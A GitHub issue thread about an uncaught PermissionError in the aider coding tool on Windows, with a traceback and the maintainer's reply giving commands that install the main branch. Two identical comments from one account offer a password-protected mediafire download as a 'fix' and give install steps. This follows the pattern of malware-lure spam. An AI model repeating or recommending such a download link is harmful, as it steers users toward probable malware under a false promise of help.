### ISSUE TITLE
Uncaught PermissionError in io.py line 240

### ISSUE THREAD

**Issue by basileus82** [paul-gauthier/aider#1257]
Aider version: 0.54.8
Python version: 3.12.2
Platform: Windows-11-10.0.22631-SP0
Python implementation: CPython
Virtual environment: No
OS: Windows 11 (64bit)
Git version: git version 2.42.0.windows.2

An uncaught exception occurred:

```
Traceback (most recent call last):
  File "<frozen runpy>", line 198, in _run_module_as_main
  File "<frozen runpy>", line 88, in _run_code
  File "__main__.py", line 7, in <module>
    sys.exit(main())
             ^^^^^^
  File "main.py", line 680, in main
    coder.run()
  File "base_coder.py", line 728, in run
    self.run_one(user_message, preproc)
  File "base_coder.py", line 765, in run_one
    message = self.preproc_user_input(user_message)
              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "base_coder.py", line 756, in preproc_user_input
    self.check_for_file_mentions(inp)
  File "base_coder.py", line 1333, in check_for_file_mentions
    self.add_rel_fname(rel_fname)
  File "base_coder.py", line 451, in add_rel_fname
    self.check_added_files()
  File "base_coder.py", line 1715, in check_added_files
    content = self.io.read_text(fname)
              ^^^^^^^^^^^^^^^^^^^^^^^^
  File "io.py", line 240, in read_text
    with open(str(filename), "r", encoding=self.encoding) as f:
         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
PermissionError: [Errno 13] Permission denied: 'C:\\Users\\bash\\SSO-SAML\\SSO'

```

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by paul-gauthier** [comment]
Thanks for trying aider and filing this issue.

The fix is available in the main branch. You can get it by installing the latest version from github:

```
aider --install-main-branch

# or...

python -m pip install --upgrade git+https://github.com/paul-gauthier/aider.git
```

If you have a chance to try it, let me know if it works better for you.
